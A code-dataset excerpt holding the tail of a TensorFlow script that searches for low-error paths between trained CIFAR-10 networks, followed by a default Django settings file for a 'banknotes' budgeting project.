self.weightslist = [self.weights['h1'],self.weights['h2'],self.weights['out']]
self.biases = {
'b1': tf.Variable(tf.random_normal([n_hidden_1])),
'b2': tf.Variable(tf.random_normal([n_hidden_2])),
'out': tf.Variable(tf.random_normal([n_classes]))
}
self.biaseslist = [self.biases['b1'],self.biases['b2'],self.biases['out']]
else:
self.weights = {
'h1': tf.Variable(w[0]),
'h2': tf.Variable(w[1]),
'out': tf.Variable(w[2])
}
self.weightslist = [self.weights['h1'],self.weights['h2'],self.weights['out']]
self.biases = {
'b1': tf.Variable(b[0]),
'b2': tf.Variable(b[1]),
'out': tf.Variable(b[2])
}
self.biaseslist = [self.biases['b1'],self.biases['b2'],self.biases['out']]
self.saver = tf.train.Saver()
def UpdateWeights(self, w, b):
with self.g.as_default():
self.weights = {
'h1': tf.Variable(w[0]),
'h2': tf.Variable(w[1]),
'out': tf.Variable(w[2])
}
self.weightslist = [self.weights['h1'],self.weights['h2'],self.weights['out']]
self.biases = {
'b1': tf.Variable(b[0]),
'b2': tf.Variable(b[1]),
'out': tf.Variable(b[2])
}
self.biaseslist = [self.biases['b1'],self.biases['b2'],self.biases['out']]
def predict(self, x):
with self.g.as_default():
layer_1 = tf.add(tf.matmul(x, self.weights['h1']), self.biases['b1'])
layer_1 = tf.nn.relu(layer_1)
# Hidden layer with RELU activation
layer_2 = tf.add(tf.matmul(layer_1, self.weights['h2']), self.biases['b2'])
layer_2 = tf.nn.relu(layer_2)
# Output layer with linear activation
out_layer = tf.matmul(layer_2, self.weights['out']) + self.biases['out']
return out_layer
def ReturnParamsAsList(self):
with self.g.as_default():
with tf.Session() as sess:
# Restore variables from disk
self.saver.restore(sess, "/home/dfreeman/PythonFun/tmp/model"+str(self.index)+".ckpt")
return sess.run(self.weightslist), sess.run(self.biaseslist)
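#WeightString holds a path ("string") of parameter sets ("beads") between two trained models.
#AllBeads[0] and AllBeads[-1] are the fixed endpoints; interior beads start as linear
#interpolations and are later retrained until they reach the accuracy threshold.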
class WeightString:
def __init__(self, w1, b1, w2, b2, numbeads, threshold):
self.w1 = w1
self.w2 = w2
self.b1 = b1
self.b2 = b2
#self.w2, self.b2 = m2.params
self.AllBeads = []
self.threshold = threshold
self.AllBeads.append([w1,b1])
for n in xrange(numbeads):
ws,bs = model_interpolate(w1,b1,w2,b2, (n + 1.)/(numbeads+1.))
self.AllBeads.append([ws,bs])
self.AllBeads.append([w2,b2])
self.ConvergedList = [False for f in xrange(len(self.AllBeads))]
self.ConvergedList[0] = True
self.ConvergedList[-1] = True
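#SpringNorm returns the summed bead-to-bead distances (weights, biases, and total) along the
#string, plus the direct endpoint-to-endpoint distances, under the given vector norm.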
def SpringNorm(self, order):
totalweights = 0.
totalbiases = 0.
totaltotal = 0.
#Energy between mobile beads
for i,b in enumerate(self.AllBeads):
if i < len(self.AllBeads)-1:
#print "Tallying energy between bead " + str(i) + " and bead " + str(i+1)
subtotalw = 0.
subtotalb = 0.
#for j in xrange(len(b)):
subtotalw += np.linalg.norm(np.subtract(flatten(self.AllBeads[i][0]),flatten(self.AllBeads[i+1][0])),ord=order)#/len(self.beads[0][j])
#for j in xrange(len(b)):
subtotalb += np.linalg.norm(np.subtract(flatten(self.AllBeads[i][1]),flatten(self.AllBeads[i+1][1])),ord=order)#/len(self.beads[0][j])
totalweights+=subtotalw
totalbiases+=subtotalb
totaltotal+=subtotalw + subtotalb
weightdist = np.linalg.norm(np.subtract(flatten(self.AllBeads[0][0]),flatten(self.AllBeads[-1][0])),ord=order)
biasdist = np.linalg.norm(np.subtract(flatten(self.AllBeads[0][1]),flatten(self.AllBeads[-1][1])),ord=order)
totaldist = np.linalg.norm(np.subtract(flatten(self.AllBeads[0]),flatten(self.AllBeads[-1])),ord=order)
return [totalweights,totalbiases,totaltotal, weightdist, biasdist, totaldist]#/len(self.beads)
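#SGDBead retrains the parameters stored at AllBeads[bead] with the standard CIFAR-10 training
#op until test precision exceeds 1 - thresh (checked every 100 steps), writes the resulting
#weights/biases back into AllBeads[bead], and returns the final test error.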
def SGDBead(self, bead, thresh, maxindex):
finalerror = 0.
#thresh = .05
# Parameters
learning_rate = 0.001
training_epochs = 15
batch_size = 100
display_step = 1
curWeights, curBiases = self.AllBeads[bead]
#test_model = multilayer_perceptron(w=curWeights, b=curBiases)
test_model = convnet(w=curWeights, b=curBiases)
with test_model.g.as_default():
global_step = tf.Variable(0, trainable=False)
# Get images and labels for CIFAR-10.
images, labels = cifar10.distorted_inputs()
test_images, test_labels = cifar10.inputs(eval_data='test')
# Build a Graph that computes the logits predictions from the
# inference model.
logits = test_model.predict(images)
logit_test = test_model.predict(test_images)
# Calculate loss.
loss = cifar10.loss(logits, labels)
# Build a Graph that trains the model with one batch of examples and
# updates the model parameters.
train_op = cifar10.train(loss, global_step)
top_k_op = tf.nn.in_top_k(logit_test, test_labels, 1)
# Build an initialization operation to run below.
init = tf.initialize_all_variables()
# Start running operations on the Graph.
#sess = tf.Session(config=tf.ConfigProto(
# log_device_placement=FLAGS.log_device_placement))
with tf.Session(config=tf.ConfigProto(
log_device_placement=False)) as sess:
sess.run(init)
tf.train.start_queue_runners(sess=sess)
step = 0
stopcond = True
while step < max_steps and stopcond:
start_time = time.time()
_, loss_value = sess.run([train_op, loss])
duration = time.time() - start_time
assert not np.isnan(loss_value), 'Model diverged with loss = NaN'
if step % 10 == 0:
num_examples_per_step = batch_size
examples_per_sec = num_examples_per_step / duration
sec_per_batch = float(duration)
format_str = ('%s: step %d, loss = %.2f (%.1f examples/sec; %.3f '
'sec/batch)')
print (format_str % (datetime.now(), step, loss_value,
examples_per_sec, sec_per_batch))
if step % 100 == 0:
num_iter = int(math.ceil(num_examples / batch_size))
true_count = 0 # Counts the number of correct predictions.
total_sample_count = num_iter * batch_size
stepp = 0
while stepp < num_iter:
predictions = sess.run([top_k_op])
true_count += np.sum(predictions)
stepp += 1
# Compute precision @ 1.
precision = true_count / total_sample_count
print('%s: precision @ 1 = %.3f' % (datetime.now(), precision))
if precision > 1 - thresh:
stopcond = False
test_model.params = sess.run(test_model.weightslist), sess.run(test_model.biaseslist)
self.AllBeads[bead]=test_model.params
finalerror = 1 - precision
print ("Final bead error: ",str(finalerror))
step += 1
return finalerror
#Model generation
#copy_model = multilayer_perceptron(ind=0)
copy_model = convnet(ind=0)
for ii in xrange(2):
'''weights = {
'h1': tf.Variable(tf.random_normal([n_input, n_hidden_1])),
'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),
'out': tf.Variable(tf.random_normal([n_hidden_2, n_classes]))
}
biases = {
'b1': tf.Variable(tf.random_normal([n_hidden_1])),
'b2': tf.Variable(tf.random_normal([n_hidden_2])),
'out': tf.Variable(tf.random_normal([n_classes]))
}'''
# Construct model with different initial weights
#test_model = multilayer_perceptron(ind=ii)
test_model = convnet(ind=ii)
#Construct model with same initial weights
#test_model = copy.copy(copy_model)
#test_model.index = ii
#print test_model.weights
models.append(test_model)
with test_model.g.as_default():
global_step = tf.Variable(0, trainable=False)
# Get images and labels for CIFAR-10.
images, labels = cifar10.distorted_inputs()
test_images, test_labels = cifar10.inputs(eval_data='test')
# Build a Graph that computes the logits predictions from the
# inference model.
logits = test_model.predict(images)
logit_test = test_model.predict(test_images)
# Calculate loss.
loss = cifar10.loss(logits, labels)
# Build a Graph that trains the model with one batch of examples and
# updates the model parameters.
train_op = cifar10.train(loss, global_step)
top_k_op = tf.nn.in_top_k(logit_test, test_labels, 1)
# Build an initialization operation to run below.
init = tf.initialize_all_variables()
# Start running operations on the Graph.
#sess = tf.Session(config=tf.ConfigProto(
# log_device_placement=FLAGS.log_device_placement))
with tf.Session(config=tf.ConfigProto(
log_device_placement=False)) as sess:
sess.run(init)
tf.train.start_queue_runners(sess=sess)
step = 0
stopcond = True
while step < max_steps and stopcond:
start_time = time.time()
_, loss_value = sess.run([train_op, loss])
duration = time.time() - start_time
assert not np.isnan(loss_value), 'Model diverged with loss = NaN'
if step % 10 == 0:
num_examples_per_step = batch_size
examples_per_sec = num_examples_per_step / duration
sec_per_batch = float(duration)
format_str = ('%s: step %d, loss = %.2f (%.1f examples/sec; %.3f '
'sec/batch)')
print (format_str % (datetime.now(), step, loss_value,
examples_per_sec, sec_per_batch))
if step % 100 == 0:
num_iter = int(math.ceil(num_examples / batch_size))
true_count = 0 # Counts the number of correct predictions.
total_sample_count = num_iter * batch_size
stepp = 0
while stepp < num_iter:
predictions = sess.run([top_k_op])
true_count += np.sum(predictions)
stepp += 1
# Compute precision @ 1.
precision = true_count / total_sample_count
print('%s: precision @ 1 = %.3f' % (datetime.now(), precision))
if precision > 1 - thresh:
stopcond = False
test_model.params = sess.run(test_model.weightslist), sess.run(test_model.biaseslist)
step += 1
#Connected components search
#Used to soften the training criterion: some slack is needed because the error measured on
#the test set differs from the error seen during training.
thresh_multiplier = 1.1
results = []
connecteddict = {}
for i1 in xrange(len(models)):
connecteddict[i1] = 'not connected'
test = WeightString(models[0].params[0],models[0].params[1],models[1].params[0],models[1].params[1],1,1)
for i1 in xrange(len(models)):
print i1
for i2 in xrange(len(models)):
if i2 > i1 and ((connecteddict[i1] != connecteddict[i2]) or (connecteddict[i1] == 'not connected' or connecteddict[i2] == 'not connected')) :
#print "slow1?"
#print i1,i2
#print models[0]
#print models[1]
#print models[0].params
#print models[1].params
#test = WeightString(models[i1].params[0],models[i1].params[1],models[i2].params[0],models[i2].params[1],1,1)
training_threshold = thresh
depth = 0
d_max = 10
#Check error between beads
#Alg: for each bead at depth i, SGD until converged.
#For beads with max error along path too large, add another bead between them, repeat
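#Concretely: every unconverged bead is trained until its own test error drops below the
#(slightly tightened) threshold, then the worst interpolation error is measured on each newly
#touched segment; any segment still above thresh_multiplier*training_threshold gets a new bead
#inserted near its worst point, and the search stops once all segments pass or d_max
#subdivision rounds are exhausted.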
#Keeps track of which indices to check the interpbeaderror between
newindices = [0,1]
while (depth < d_max):
print newindices
#print "slow2?"
#X, y = GenTest(X,y)
counter = 0
for i,c in enumerate(test.ConvergedList):
if c == False:
#print "slow3?"
error = test.SGDBead(i, .98*training_threshold, 20)
#print "slow4?"
#if counter%5000==0:
# print counter
# print error
test.ConvergedList[i] = True
print test.ConvergedList
interperrors = []
interp_bead_indices = []
for b in xrange(len(test.AllBeads)-1):
if b in newindices:
e = InterpBeadError(test.AllBeads[b][0],test.AllBeads[b][1], test.AllBeads[b+1][0], test.AllBeads[b+1][1])
interperrors.append(e)
interp_bead_indices.append(b)
print interperrors
if max([ee[0] for ee in interperrors]) < thresh_multiplier*training_threshold:
depth = 2*d_max
#print test.ConvergedList
#print test.SpringNorm(2)
#print "Done!"
else:
del newindices[:]
#Interperrors stores the maximum error on the path between beads
#shift index to account for added beads
shift = 0
for i, ie in enumerate(interperrors):
if ie[0] > thresh_multiplier*training_threshold:
k = interp_bead_indices[i]
ws,bs = model_interpolate(test.AllBeads[k+shift][0],test.AllBeads[k+shift][1],\
test.AllBeads[k+shift+1][0],test.AllBeads[k+shift+1][1],\
ie[1]/20.)
test.AllBeads.insert(k+shift+1,[ws,bs])
test.ConvergedList.insert(k+shift+1, False)
newindices.append(k+shift+1)
newindices.append(k+shift)
shift+=1
#print test.ConvergedList
#print test.SpringNorm(2)
#print d_max
depth += 1
if depth == 2*d_max:
results.append([i1,i2,test.SpringNorm(2),"Connected"])
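#Merge connectivity labels: a freshly connected pair ends up sharing one component id.
#Unlabeled models inherit their partner's label (or i1 if both are new); if both already carry
#labels, every model in i2's component is relabeled to i1's.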
if connecteddict[i1] == 'not connected' and connecteddict[i2] == 'not connected':
connecteddict[i1] = i1
connecteddict[i2] = i1
if connecteddict[i1] == 'not connected':
connecteddict[i1] = connecteddict[i2]
else:
if connecteddict[i2] == 'not connected':
connecteddict[i2] = connecteddict[i1]
else:
if connecteddict[i1] != 'not connected' and connecteddict[i2] != 'not connected':
hold = connecteddict[i2]
connecteddict[i2] = connecteddict[i1]
for h in xrange(len(models)):
if connecteddict[h] == hold:
connecteddict[h] = connecteddict[i1]
else:
results.append([i1,i2,test.SpringNorm(2),"Disconnected"])
#print results[-1]
uniquecomps = []
totalcomps = 0
for i in xrange(len(models)):
if not (connecteddict[i] in uniquecomps):
uniquecomps.append(connecteddict[i])
if connecteddict[i] == 'not connected':
totalcomps += 1
#print i,connecteddict[i]
notconoffset = 0
if 'not connected' in uniquecomps:
notconoffset = -1
#with open('DSSCIFAR.' + str(thresh) + '.' + str(num_run) + '.out','w+') as f:
print "Thresh: " + str(thresh) + "\n"
print "Comps: " + str(len(uniquecomps) + notconoffset + totalcomps) + "\n"
connsum = []
for r in results:
if r[3] == "Connected":
connsum.append(r[2])
#print r[2]
print "***\n"
print str(len(test.AllBeads)) + "\n"
print "\t".join([str(s) for s in connsum[0]])
#print np.average(connsum)
#print np.std(connsum)
| mit | -1,522,237,430,314,512,100 | 29.982571 | 144 | 0.615123 | false | 2.942473 | true | false | false |
neqelr17/banknotes | banknotes/settings.py | 1 | 3207 | """
Django settings for banknotes project.
Generated by 'django-admin startproject' using Django 1.9.7.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'm@hb1flp0z#d@+#(l=2^ox!(945_4o7(q5$3c2___h18$m=ad5'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'budget.apps.BudgetConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'banknotes.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'banknotes.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| gpl-3.0 | -6,370,282,057,669,393,000 | 25.286885 | 91 | 0.688806 | false | 3.508753 | false | false | false |